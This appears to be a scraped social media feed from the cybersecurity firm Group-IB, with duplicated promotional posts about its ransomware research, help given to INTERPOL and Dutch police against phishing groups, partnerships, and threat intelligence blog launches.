#blog #ransomware
REvil Twins: Deep Dive into Prolific RaaS Affiliates' TTPs
🔹Ransomware continues to dominate the cybercriminal scene in 2021. The number of attacks as well as the ransom demands seem to be growing quickly. According to the Ransomware Uncovered 2020-2021 report, Ransomware-as-a-Service model, which involves the developers selling/leasing malware to the program affiliates for further network compromise and ransomware deployment, became one of the major driving forces behind phenomenal growth of the ransomware market.
🔹Group-IB DFIR team observed that 64% of all ransomware attacks it analyzed in 2020 came from operators using the RaaS model.
🔹In our new blog post by Oleg Skulkin, Senior Digital Forensics analyst at Group-IB, we focus on one of the most active ransomware collectives, REvil, and their RaaS program, which attracts more and more affiliates due to the shutdown of other RaaS.
🔹Our experts took a deep dive into the modus operandi of REvil affiliates and shared some information on various affiliates' tactics, techniques and procedures observed, so defenders can tune their detection capabilities accordingly.
🔹Make sure to save the detection tips and REvil affiliates’ TTPs mapped in accordance with MITRE ATT&CK by Group-IB DFIR team.
➡️ Click here to read the blog now.
REvil Twins: Deep Dive into Prolific RaaS Affiliates' TTPs
🔹Ransomware continues to dominate the cybercriminal scene in 2021. The number of attacks as well as the ransom demands seem to be growing quickly. According to the Ransomware Uncovered 2020-2021 report, Ransomware-as-a-Service model, which involves the developers selling/leasing malware to the program affiliates for further network compromise and ransomware deployment, became one of the major driving forces behind phenomenal growth of the ransomware market.
🔹Group-IB DFIR team observed that 64% of all ransomware attacks it analyzed in 2020 came from operators using the RaaS model.
🔹In our new blog post by Oleg Skulkin, Senior Digital Forensics analyst at Group-IB, we focus on one of the most active ransomware collectives, REvil, and their RaaS program, which attracts more and more affiliates due to the shutdown of other RaaS.
🔹Our experts took a deep dive into the modus operandi of REvil affiliates and shared some information on various affiliates' tactics, techniques and procedures observed, so defenders can tune their detection capabilities accordingly.
🔹Make sure to save the detection tips and REvil affiliates’ TTPs mapped in accordance with MITRE ATT&CK by Group-IB DFIR team.
➡️ Click here to read the blog now.
Group-IB
Ransomware Uncovered 2020/2021 | Group-IB Research
The complete guide to the latest tactics, techniques, and procedures of ransomware operators based on MITRE ATT&CK®
#ransomware #groupib #reverseengineering #Ryuk #GrimAgent
Group-IB Threat Intelligence team reverse engineered the Grim Agent backdoor used in Ryuk ransomware operations for the very first time
Our latest blog comes with all the details, including Yara and Suricata rules.
Ransomware activity increased drastically over the past couple of years and became the face of cybercrime by 2021.
📄 According to the Ransomware Uncovered 2020-2021 report, the number of ransomware attacks increased by more than 150% in 2020. The attacks grew in not only number but also scale and sophistication — the average ransom demand increased by more than twofold and amounted to $170,000 in 2020.
👥 Gangs are constantly evolving. The past year saw ransomware operators change their tactics, defense evasion techniques, and procedures to ensure that their illicit business thrives. Given that ransomware attacks are conducted by humans, understanding the modus operandi and toolset used by attackers is essential for companies that want to avoid costly downtimes. Ultimately, knowing how ransomware gangs operate and being able to thwart their attacks is more cost-effective than paying ransoms.
🔹 One of the underlying trends of 2021 to keep in mind is the use of commodity malware. The infamous ransomware gang Ryuk, which is responsible for many high-profile cyber heists followed suit. The most recent addition to their arsenal, which is yet to be explored, is the malware called GrimAgent.
💡Our new blog features the first comprehensive analysis of the GrimAgent backdoor. It is intended mainly for reverse engineers, researchers and blue teams so that they can create and implement rules that help monitor this cyber threat closely.
💪The blog also provides a great illustration of our team in action.
➡️ Click here to check it out.
Group-IB Threat Intelligence team reverse engineered the Grim Agent backdoor used in Ryuk ransomware operations for the very first time
Our latest blog comes with all the details, including Yara and Suricata rules.
Ransomware activity increased drastically over the past couple of years and became the face of cybercrime by 2021.
📄 According to the Ransomware Uncovered 2020-2021 report, the number of ransomware attacks increased by more than 150% in 2020. The attacks grew in not only number but also scale and sophistication — the average ransom demand increased by more than twofold and amounted to $170,000 in 2020.
👥 Gangs are constantly evolving. The past year saw ransomware operators change their tactics, defense evasion techniques, and procedures to ensure that their illicit business thrives. Given that ransomware attacks are conducted by humans, understanding the modus operandi and toolset used by attackers is essential for companies that want to avoid costly downtimes. Ultimately, knowing how ransomware gangs operate and being able to thwart their attacks is more cost-effective than paying ransoms.
🔹 One of the underlying trends of 2021 to keep in mind is the use of commodity malware. The infamous ransomware gang Ryuk, which is responsible for many high-profile cyber heists followed suit. The most recent addition to their arsenal, which is yet to be explored, is the malware called GrimAgent.
💡Our new blog features the first comprehensive analysis of the GrimAgent backdoor. It is intended mainly for reverse engineers, researchers and blue teams so that they can create and implement rules that help monitor this cyber threat closely.
💪The blog also provides a great illustration of our team in action.
➡️ Click here to check it out.
Group-IB
The Brothers Grim
The reversing tale of GrimAgent malware used by Ryuk
#mssp #gib_thf
Group-IB has signed a partnership agreement with CyberSec Services, a Managed Security Services Provider with offices in Milan and Ticino 🇮🇹🇨🇭
🤝 CyberSec Services becomes the first partner in Europe who joined Group-IB’s MSSP & MDR program.
⏫ Thanks to the partnership Italian and Swiss companies can now take advantage of Group-IB’s Threat Hunting Framework - first ever single multi-tenant solution to identify and attribute cyber criminals, detect, hunt, and respond to most sophisticated threats in both IT and OT networks.
💬 Alessandro Aresi, CEO of CyberSec Services, comments: “We have identified Group-IB as the ideal partner for a service offering which covers the most different needs of our customers. The peculiarity of Group-IB is the completeness of their solutions and the ability to make their portfolio compatible and complementary to an MSSP such as CyberSec Services.
One of the most interesting aspects for us, besides the consolidated experience in the field of Cyber Threat Intelligence and Investigation, is the ability to let converge the more traditional world of IT with the world of OT. This aspect allowed us for example to serve at best one of our most relevant customers, who wanted to source out full protection of their power plants and of the entire IT infrastructure from one single hand, with considerable savings in time and costs”.
Group-IB has signed a partnership agreement with CyberSec Services, a Managed Security Services Provider with offices in Milan and Ticino 🇮🇹🇨🇭
🤝 CyberSec Services becomes the first partner in Europe who joined Group-IB’s MSSP & MDR program.
⏫ Thanks to the partnership Italian and Swiss companies can now take advantage of Group-IB’s Threat Hunting Framework - first ever single multi-tenant solution to identify and attribute cyber criminals, detect, hunt, and respond to most sophisticated threats in both IT and OT networks.
💬 Alessandro Aresi, CEO of CyberSec Services, comments: “We have identified Group-IB as the ideal partner for a service offering which covers the most different needs of our customers. The peculiarity of Group-IB is the completeness of their solutions and the ability to make their portfolio compatible and complementary to an MSSP such as CyberSec Services.
One of the most interesting aspects for us, besides the consolidated experience in the field of Cyber Threat Intelligence and Investigation, is the ability to let converge the more traditional world of IT with the world of OT. This aspect allowed us for example to serve at best one of our most relevant customers, who wanted to source out full protection of their power plants and of the entire IT infrastructure from one single hand, with considerable savings in time and costs”.
Group-IB
MSSP and MDR Partner Program
Group-IB wants to take security services to the next level with its MSSP / MDR Partner Program which combines full visibility of real threats and a rapid response to them in a single solution.
#interpol #phishing #fraud #carding
Group-IB has supported INTERPOL in its Lyrebird operation that resulted in the identification and apprehension of a threat actor presumably responsible for multiple attacks worldwide.
👥 According to Group-IB’s Threat Intelligence team, the suspect, dubbed Dr HeX by Group-IB based on one of the nicknames that he used, has been active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims.
⚔️ The alleged perpetrator, who turned out to be a citizen of Morocco, was arrested in May by the Moroccan police based on the data about his cybercrimes that was provided by Group-IB.
🧑💻 The starting point of Group-IB’s research to identify and deanonymize the cybercriminal was the extraction of a phishing kit (a tool used to create phishing web pages) exploiting the brand of a large French bank by Group-IB’s Threat Intelligence & Attribution system.
🔁 The set-up of the detected phishing kit followed a common technique, with the creation of a spoofed website of a targeted company, the mass distribution of emails impersonating it and asking users to enter login information on the spoofed site. The credentials left by unsuspecting victims on the fake page were then redirected to the perpetrator’s email. Almost each of the scripts contained in the phishing kit had its creator’s nickname, Dr HeX, and contact email address.
➡️ Curious to learn the details? Click here to read the full story!
Group-IB has supported INTERPOL in its Lyrebird operation that resulted in the identification and apprehension of a threat actor presumably responsible for multiple attacks worldwide.
👥 According to Group-IB’s Threat Intelligence team, the suspect, dubbed Dr HeX by Group-IB based on one of the nicknames that he used, has been active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims.
⚔️ The alleged perpetrator, who turned out to be a citizen of Morocco, was arrested in May by the Moroccan police based on the data about his cybercrimes that was provided by Group-IB.
🧑💻 The starting point of Group-IB’s research to identify and deanonymize the cybercriminal was the extraction of a phishing kit (a tool used to create phishing web pages) exploiting the brand of a large French bank by Group-IB’s Threat Intelligence & Attribution system.
🔁 The set-up of the detected phishing kit followed a common technique, with the creation of a spoofed website of a targeted company, the mass distribution of emails impersonating it and asking users to enter login information on the spoofed site. The credentials left by unsuspecting victims on the fake page were then redirected to the perpetrator’s email. Almost each of the scripts contained in the phishing kit had its creator’s nickname, Dr HeX, and contact email address.
➡️ Curious to learn the details? Click here to read the full story!
Group-IB
Operation Lyrebird: Group-IB assists INTERPOL in identifying suspect behind numerous cybercrimes worldwide
Group-IB has supported INTERPOL in its Lyrebird operation that resulted in the identification and apprehension of a threat actor.
#gib_thf #marketplace
Group-IB joins Palo Alto Networks Cortex XSOAR Marketplace
⭐️ Our Threat Hunting Framework Polygon, a Malware Detonation & Research platform, is now available on the Palo Alto Networks Cortex XSOAR Marketplace, the industry’s largest and most comprehensive security orchestration marketplace. The content pack from Group-IB on Cortex XSOAR’s Marketplace provides customers with a tool that guarantees malware detonation and behavioral analysis, and was developed by engineers with long-standing experience in investigating cybercrimes worldwide, and participating in global operations with international law enforcement, incident response, and cyberattack monitoring and attribution.
🔁 Group-IB’s THF Polygon is an integral part of the company’s ecosystem of high-powered and innovative solutions for protection against previously unknown threats and targeted attacks along with investigating and responding to cybercrimes to minimize potential consequences. Be sure to have a look at the comprehensive overview to learn more.
💬 “A robust, open ecosystem is at the heart of Cortex XSOAR,” said Rishi Bhargava, VP of Product Strategy for Cortex XSOAR at Palo Alto Networks. “We are proud to welcome Group-IB to the Cortex XSOAR Marketplace ecosystem, which has 700+ integrations that enable our customers to connect disparate security tools and data sources to enable maximum efficiency in the SOC.”
Group-IB joins Palo Alto Networks Cortex XSOAR Marketplace
⭐️ Our Threat Hunting Framework Polygon, a Malware Detonation & Research platform, is now available on the Palo Alto Networks Cortex XSOAR Marketplace, the industry’s largest and most comprehensive security orchestration marketplace. The content pack from Group-IB on Cortex XSOAR’s Marketplace provides customers with a tool that guarantees malware detonation and behavioral analysis, and was developed by engineers with long-standing experience in investigating cybercrimes worldwide, and participating in global operations with international law enforcement, incident response, and cyberattack monitoring and attribution.
🔁 Group-IB’s THF Polygon is an integral part of the company’s ecosystem of high-powered and innovative solutions for protection against previously unknown threats and targeted attacks along with investigating and responding to cybercrimes to minimize potential consequences. Be sure to have a look at the comprehensive overview to learn more.
💬 “A robust, open ecosystem is at the heart of Cortex XSOAR,” said Rishi Bhargava, VP of Product Strategy for Cortex XSOAR at Palo Alto Networks. “We are proud to welcome Group-IB to the Cortex XSOAR Marketplace ecosystem, which has 700+ integrations that enable our customers to connect disparate security tools and data sources to enable maximum efficiency in the SOC.”
#phishing #benelux
Group-IB has assisted the Dutch National Police in the operation to apprehend alleged members of a cybercriminal group codenamed “Fraud Family”
⚔️ Our Amsterdam-based team has identified the individuals behind the Dutch-speaking syndicate that develops, sells and rents sophisticated phishing frameworks, and shared their findings with the authorities. According to the police, the operation resulted in the arrest of two suspects who are thought to be the developer and seller of the phishing frameworks distributed by the Fraud Family.
🧑💻 Group-IB Threat Intelligence unit has been detecting massive phishing attacks against Dutch and Belgian residents since the beginning of 2020. The fake pages detected by Group-IB Threat Intelligence & Attribution system were almost identical and disguised to look like legitimate websites of the biggest local financial organizations to trick unsuspecting victims into providing their personal and banking data.
👥 A typical attack, analyzed by Group-IB researchers, started with an email, SMS, or WhatsApp message impersonating a real financial organization. Using well-known brands, fraudsters gained users’ immediate trust. These fake notifications contained malicious links to adversary-controlled phishing websites that steal payment info.
🔁 Having analyzed the technical infrastructure and phishing templates used in these fraudulent campaigns, our researchers uncovered a massive Fraud-as-a-Service operation.
💬 Dutch Public Prosecutor, Attorney Witeke Koorn said: “Digital fraud such as phishing is a social problem that requires an integrated approach. This approach involves a joint effort between the Police, Public Prosecutors, banks, government agencies and others together for investigation, prosecution and prevention."
➡️ Click here to read the full story and make sure to check out our latest blog post for detailed technical analysis of Fraud Family’s operations.
Group-IB has assisted the Dutch National Police in the operation to apprehend alleged members of a cybercriminal group codenamed “Fraud Family”
⚔️ Our Amsterdam-based team has identified the individuals behind the Dutch-speaking syndicate that develops, sells and rents sophisticated phishing frameworks, and shared their findings with the authorities. According to the police, the operation resulted in the arrest of two suspects who are thought to be the developer and seller of the phishing frameworks distributed by the Fraud Family.
🧑💻 Group-IB Threat Intelligence unit has been detecting massive phishing attacks against Dutch and Belgian residents since the beginning of 2020. The fake pages detected by Group-IB Threat Intelligence & Attribution system were almost identical and disguised to look like legitimate websites of the biggest local financial organizations to trick unsuspecting victims into providing their personal and banking data.
👥 A typical attack, analyzed by Group-IB researchers, started with an email, SMS, or WhatsApp message impersonating a real financial organization. Using well-known brands, fraudsters gained users’ immediate trust. These fake notifications contained malicious links to adversary-controlled phishing websites that steal payment info.
🔁 Having analyzed the technical infrastructure and phishing templates used in these fraudulent campaigns, our researchers uncovered a massive Fraud-as-a-Service operation.
💬 Dutch Public Prosecutor, Attorney Witeke Koorn said: “Digital fraud such as phishing is a social problem that requires an integrated approach. This approach involves a joint effort between the Police, Public Prosecutors, banks, government agencies and others together for investigation, prosecution and prevention."
➡️ Click here to read the full story and make sure to check out our latest blog post for detailed technical analysis of Fraud Family’s operations.
Group-IB
Group-IB helps Dutch police identify members of phishing developer gang Fraud Family
Group-IB, one of the leading providers of solutions dedicated to detecting and preventing cyberattacks, identifying online fraud, investigation of high-tech crimes and intellectual property protection, has assisted the Dutch National Police in the operation…
#mou #cooperation
Group-IB and CyberPeace Institute collaborate for a safer cyberspace
Earlier this week, Group-IB and the CyberPeace Institute signed a Memorandum of Understanding (MoU) to collectively mobilize action for cyber security and to strengthen ongoing cooperation across multiple areas including:
👉Sharing of knowledge and expertise on threat hunting, digital forensics and investigations
👉Technical support for threat hunting, threat intelligence, digital forensics, Incident Response and Investigations
👉Cross-border collaboration on research and development for the protection of critical information infrastructures
🔹Nick Palmer, Head of Global Business at Group-IB welcomed the MoU agreement and had this to say: “CyberPeace Institute is one of those organizations that makes the world a better place by ridding cyber criminals of it. With an incredible team of experienced experts, NGO constituents of CyberPeace Institute receive support in analysis and post-incident investigations. As Group-IB, and our team of experts, hold near and dear investigation and attribution of cyber criminals, it is our great pleasure to support the CyberPeace Institute with our technical analysts from Threat Intelligence, Hi Tech Crime Investigations, CERT-GIB and much more. With these types of public - private partnerships we can ensure that we work together for the good of the world in the fight against cybercrime.”
🔹 The CyberPeace Institute is an independent non-governmental organization whose mission is to ensure the rights of people to security, dignity and equity in cyberspace. The Institute works in close collaboration with relevant partners to reduce the harms from cyberattacks on people’s lives worldwide. By analyzing cyberattacks, the Institute exposes their societal impact, how international laws and norms are being violated, and advances responsible behaviour to enforce cyberpeace.
🔹“At the heart of the CyberPeace Institute’s efforts is the recognition that cyberspace is about people. We need to act collectively and collaboratively to ensure respect for people’s rights and safety. Combining our knowledge and expertise with Group-IB, this MoU is a clear signal of intent for deeper and more coordinated collaboration striving for a cyberspace at peace, for everyone, everywhere” stated Bruno Halopeau, Chief Technology Officer, CyberPeace Institute.
🔹 CyberPeace Institute’s ongoing mission includes increasing public awareness of the real-life impact of cyberattacks as well as reminding state and non-state actors of the international law and norms governing responsible behaviour in cyberspace to reduce harm and ensure the respect of the rights of people in cyberspace. This approach goes in line with one of Group-IB’s core values: zero tolerance to cybercrime, which makes us even more excited to bring our cooperation to the next level.
Group-IB and CyberPeace Institute collaborate for a safer cyberspace
Earlier this week, Group-IB and the CyberPeace Institute signed a Memorandum of Understanding (MoU) to collectively mobilize action for cyber security and to strengthen ongoing cooperation across multiple areas including:
👉Sharing of knowledge and expertise on threat hunting, digital forensics and investigations
👉Technical support for threat hunting, threat intelligence, digital forensics, Incident Response and Investigations
👉Cross-border collaboration on research and development for the protection of critical information infrastructures
🔹Nick Palmer, Head of Global Business at Group-IB welcomed the MoU agreement and had this to say: “CyberPeace Institute is one of those organizations that makes the world a better place by ridding cyber criminals of it. With an incredible team of experienced experts, NGO constituents of CyberPeace Institute receive support in analysis and post-incident investigations. As Group-IB, and our team of experts, hold near and dear investigation and attribution of cyber criminals, it is our great pleasure to support the CyberPeace Institute with our technical analysts from Threat Intelligence, Hi Tech Crime Investigations, CERT-GIB and much more. With these types of public - private partnerships we can ensure that we work together for the good of the world in the fight against cybercrime.”
🔹 The CyberPeace Institute is an independent non-governmental organization whose mission is to ensure the rights of people to security, dignity and equity in cyberspace. The Institute works in close collaboration with relevant partners to reduce the harms from cyberattacks on people’s lives worldwide. By analyzing cyberattacks, the Institute exposes their societal impact, how international laws and norms are being violated, and advances responsible behaviour to enforce cyberpeace.
🔹“At the heart of the CyberPeace Institute’s efforts is the recognition that cyberspace is about people. We need to act collectively and collaboratively to ensure respect for people’s rights and safety. Combining our knowledge and expertise with Group-IB, this MoU is a clear signal of intent for deeper and more coordinated collaboration striving for a cyberspace at peace, for everyone, everywhere” stated Bruno Halopeau, Chief Technology Officer, CyberPeace Institute.
🔹 CyberPeace Institute’s ongoing mission includes increasing public awareness of the real-life impact of cyberattacks as well as reminding state and non-state actors of the international law and norms governing responsible behaviour in cyberspace to reduce harm and ensure the respect of the rights of people in cyberspace. This approach goes in line with one of Group-IB’s core values: zero tolerance to cybercrime, which makes us even more excited to bring our cooperation to the next level.
CyberPeace Institute
Home | CyberPeace Institute
CyberPeace Institute The CyberPeace Institute protects the most vulnerable in cyberspace. We deliver cybersecurity assistance and hold all actors accountable for ensuring peace in cyberspace by exposing the human harm […]
#pdd #education #singapore
Exciting news! We became the first cybersecurity company to join JTC’s Punggol Digital District
🤖 The district is a home to top international players in cybersecurity, blockchain, robotics and smart living solutions in Singapore.
🕴At the inaugural PDD: Connecting Smartness event held earlier today, Singapore’s Minister for Trade and Industry Mr Gan Kim Yong announced Group-IB’s move into the smart district, along with three other international heavyweights in the digital sectors.
💬 “It’s a great honor for me and my company to be part of JTC’s Punggol Digital District,” commented Group-IB CEO and founder Ilya Sachkov. “I’m sure that today marks a milestone for Singapore and the Asia-Pacific region in general as we’re inaugurating a strategic project that will be leading Singapore in the implementation of its Smart Nation Initiative and will stand at the forefront of the region’s digital transformation. I feel a special responsibility for this initiative since my company, Group-IB, is the first cybersecurity company to join this smart district and we expect a great journey ahead.”
As the first cybersecurity firm to join the initiative, we will👇
🔹Bring the expertise that we accumulated over nearly two decades
🔹Become an all-inclusive cybersecurity provider to the community, bringing, among others, our system intended for creating organization-tailored threat landscape, analyzing and attributing cyberattacks and proactive threat hunting, Threat Intelligence & Attribution, and solution for adversary-centric detection of targeted attacks and unknown threats for IT and OT environments, Threat Hunting Framework, to it.
🔹Collaborate with the Singapore Institute of Technology to develop and operate a cybersecurity testing facility in the smart district – PDD Cyberpolygon Sandzone, a tool for emulating network infrastructures of any configuration, topology or scale for both theoretical research and practical trials.
🔹Work with other players in Punggol Digital District, like the Cyber Security Agency of Singapore , the Government Technology Agency, and cybersecurity associations to turn the district into the space of advanced cybersecurity awareness and form risk-aware culture.
We are confident that our active presence will give students opportunities to apply knowledge in the real-world context through access to Group-IB’s solutions and monitoring systems 💪
Exciting news! We became the first cybersecurity company to join JTC’s Punggol Digital District
🤖 The district is a home to top international players in cybersecurity, blockchain, robotics and smart living solutions in Singapore.
🕴At the inaugural PDD: Connecting Smartness event held earlier today, Singapore’s Minister for Trade and Industry Mr Gan Kim Yong announced Group-IB’s move into the smart district, along with three other international heavyweights in the digital sectors.
💬 “It’s a great honor for me and my company to be part of JTC’s Punggol Digital District,” commented Group-IB CEO and founder Ilya Sachkov. “I’m sure that today marks a milestone for Singapore and the Asia-Pacific region in general as we’re inaugurating a strategic project that will be leading Singapore in the implementation of its Smart Nation Initiative and will stand at the forefront of the region’s digital transformation. I feel a special responsibility for this initiative since my company, Group-IB, is the first cybersecurity company to join this smart district and we expect a great journey ahead.”
As the first cybersecurity firm to join the initiative, we will👇
🔹Bring the expertise that we accumulated over nearly two decades
🔹Become an all-inclusive cybersecurity provider to the community, bringing, among others, our system intended for creating organization-tailored threat landscape, analyzing and attributing cyberattacks and proactive threat hunting, Threat Intelligence & Attribution, and solution for adversary-centric detection of targeted attacks and unknown threats for IT and OT environments, Threat Hunting Framework, to it.
🔹Collaborate with the Singapore Institute of Technology to develop and operate a cybersecurity testing facility in the smart district – PDD Cyberpolygon Sandzone, a tool for emulating network infrastructures of any configuration, topology or scale for both theoretical research and practical trials.
🔹Work with other players in Punggol Digital District, like the Cyber Security Agency of Singapore , the Government Technology Agency, and cybersecurity associations to turn the district into the space of advanced cybersecurity awareness and form risk-aware culture.
We are confident that our active presence will give students opportunities to apply knowledge in the real-world context through access to Group-IB’s solutions and monitoring systems 💪
Group-IB
Threat Intelligence Platform | Group-IB Cybersecurity Products
A threat intelligence platform (TIP), also known as a cyber threat intelligence platform, is a technology solution for gathering, combining, and organizing threat intelligence from various sources.
#pdd #singapore
The Punggol Digital District brings together the Singapore Institute of Technology campus and JTC’s Business Park spaces within Punggol North to create Singapore’s first truly smart district.
It is envisioned to be a home for growth industries of the digital economy like cybersecurity and digital technology as well as an inclusive and green lifestyle destination for the surrounding community.
📽 Check out the video about this unique location, featuring our CEO Ilya Sachkov!
The Punggol Digital District brings together the Singapore Institute of Technology campus and JTC’s Business Park spaces within Punggol North to create Singapore’s first truly smart district.
It is envisioned to be a home for growth industries of the digital economy like cybersecurity and digital technology as well as an inclusive and green lifestyle destination for the surrounding community.
📽 Check out the video about this unique location, featuring our CEO Ilya Sachkov!
YouTube
Punggol Digital District Connecting Smartness
Punggol Digital District is shaping up well to be a vibrant lab where Singapore's Smart Nation ambitions become a reality. From exploring urban living solutions to testing the latest in robotics technology, see what's in store at the nation's first smart…
#blog #threatintelligence
The new Group-IB Threat Intelligence blog is here!
🧑💻 This post opens a series in which Group-IB team members will explain how to maximize the value of threat intelligence and attribution. We will showcase how to take advantage of different proprietary features of Group-IB’s Threat Intelligence & Attribution solution to provide better protection to customer assets and help them make more informed and balanced risk mitigation decisions.
Be sure to read today’s edition to find out 👇
🔹How wide is the market for breached databases
🔹How attackers use this compromised data to harm businesses and extract financial gain
🔹Which technologies are needed to detect and monitor breached credentials
🔹How to solve a number of threatening use cases with the “Breached DB” section of Group-IB Threat Intelligence & Attribution
➡️ Click here to read now!
The new Group-IB Threat Intelligence blog is here!
🧑💻 This post opens a series in which Group-IB team members will explain how to maximize the value of threat intelligence and attribution. We will showcase how to take advantage of different proprietary features of Group-IB’s Threat Intelligence & Attribution solution to provide better protection to customer assets and help them make more informed and balanced risk mitigation decisions.
Be sure to read today’s edition to find out 👇
🔹How wide is the market for breached databases
🔹How attackers use this compromised data to harm businesses and extract financial gain
🔹Which technologies are needed to detect and monitor breached credentials
🔹How to solve a number of threatening use cases with the “Breached DB” section of Group-IB Threat Intelligence & Attribution
➡️ Click here to read now!
#blog #threatintelligence #chineseapt
New Group-IB blog is live!
Our Threat Intelligence team discovered that the attacks on Russian government organisations in 2020, earlier attributed to Chinese nation state TA by SentinelOne, could have been carried out by two Chinese groups #TA428 and #TaskMasters.
Group-IB researchers analysed the toolset used in the attacks, compared it with these APTs’ arsenal seen in the past, and showed how their malware has evolved.
➡️ Click here to learn more details!
New Group-IB blog is live!
Our Threat Intelligence team discovered that the attacks on Russian government organisations in 2020, earlier attributed to Chinese nation state TA by SentinelOne, could have been carried out by two Chinese groups #TA428 and #TaskMasters.
Group-IB researchers analysed the toolset used in the attacks, compared it with these APTs’ arsenal seen in the past, and showed how their malware has evolved.
➡️ Click here to learn more details!